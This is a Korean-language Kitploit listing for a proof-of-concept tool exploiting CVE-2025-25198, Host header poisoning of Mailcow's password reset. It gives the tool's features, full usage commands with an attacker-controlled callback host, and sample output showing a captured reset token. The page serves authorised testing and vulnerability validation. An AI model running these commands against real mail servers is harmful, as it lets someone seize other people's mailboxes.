Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-25198-PoC — CVE-2025-25198을 위한 PoC: Mailcow 자동 호스트 헤더 포이즈닝 테스트 - HTTPS 리스너, 자동 쿠키/CSRF 처리, 첫 번째 재설정 링크 캡처. | Kitploit
도구/GitHubGitHub/groppoxx/cve-2025-25198-poc
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

CVE-2025-25198을 위한 PoC: Mailcow 자동 호스트 헤더 포이즈닝 테스트 - HTTPS 리스너, 자동 쿠키/CSRF 처리, 첫 번째 재설정 링크 캡처.

저장소 보기
20154개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-25198-PoC

CVE-2025-25198에 대한 개념 증명(PoC)으로, Mailcow 비밀번호 재설정 흐름에 영향을 미치는 Host 헤더 중독 문제입니다.

이 스크립트는 로컬 HTTPS 리스너를 포트 443에서 시작하고, 유효한 CSRF 토큰을 자동으로 획득하며, 중독된 Host 헤더로 비밀번호 재설정 시퀀스를 전송한 후 HTTP 응답 또는 리스너로의 콜백을 통해 재설정 링크가 복구되면 중단됩니다.

기능

  1. 자체 서명된 인증서로 HTTPS 리스너를 시작합니다.
  2. 새 HTTP 클라이언트 세션을 생성합니다.
  3. CSRF 토큰을 자동으로 획득합니다.
  4. 제어된 Host 헤더로 재설정 흐름을 전송합니다.
  5. 응답 및 리디렉션에서 재설정 링크를 추출합니다.
  6. 대상이 대역외로 링크를 보낼 경우 리스너 히트를 대기합니다.
  7. 첫 번째 유효한 재설정 링크에서 중지하고 깔끔하게 출력합니다.

요구사항

Python 3.8+
OpenSSL in PATH
sudo/root 권한으로 포트 443 바인딩
대상에서 인바운드 TCP/443 접근 가능

의존성 설치:

pip install -r requirements.txt

빠른 시작

꺾쇠괄호(< >)로 감싸진 값은 자리표시자입니다. 자신의 값으로 바꾸고 <, > 문자는 포함하지 마세요.

sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

자리표시자

<MAILCOW_URL>    # 대상 Mailcow 기본 URL. 예: https://mail.example.com
<MAILBOX>        # 재설정 폼에 전달되는 메일박스/사용자. 보통 이메일 주소.
<ATTACKER_HOST>  # 대상이 TCP/443에 도달할 수 있는 IP 또는 DNS 이름.

전체 예제

sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

예제 출력:

[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

데모

asciicast

선택적 플래그

--http2
   httpx를 통해 HTTP/2 사용. 최신 브라우저와의 최상의 호환성을 위해 권장됨.

--interval <seconds>
   시도와 리스너 대기 창 사이의 초 단위 간격. 기본값: 8

--max-attempts <N>
   N회 시도 후 중단. 기본값: 0 (무제한 재시도)

--cookie '<pairs>'
   클라이언트 쿠키 저장소를 수동으로 시드합니다.
   예: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   자동 발견 대신 알려진 CSRF 토큰 사용.

--only-final
   진행 로그를 숨기고 최종 재설정 링크 배너만 출력합니다.

참고사항

  • 리스너는 항상 포트 443에 바인딩됩니다.
  • Linux/macOS에서 포트 443을 바인딩하려면 sudo 또는 root 권한이 필요합니다.
  • 대상은 https://<ATTACKER_HOST>/에 도달할 수 있어야 합니다.
  • HTTP 응답에서 재설정 링크를 찾으면 스크립트가 즉시 종료됩니다.
  • 응답에서 링크를 찾지 못하면 HTTPS 리스너로의 콜백을 기다립니다.
  • 링크가 복구되지 않으면 기본적으로 8초마다 시퀀스를 재시도합니다.
  • server.pem 및 server.key가 없으면 자동으로 생성됩니다.

법적 고지

이 PoC는 공인된 보안 테스트, 실험실 환경 및 취약점 검증을 위한 것입니다. 명시적 허가 없이 시스템에 대해 사용하지 마십시오.

도구 다운로드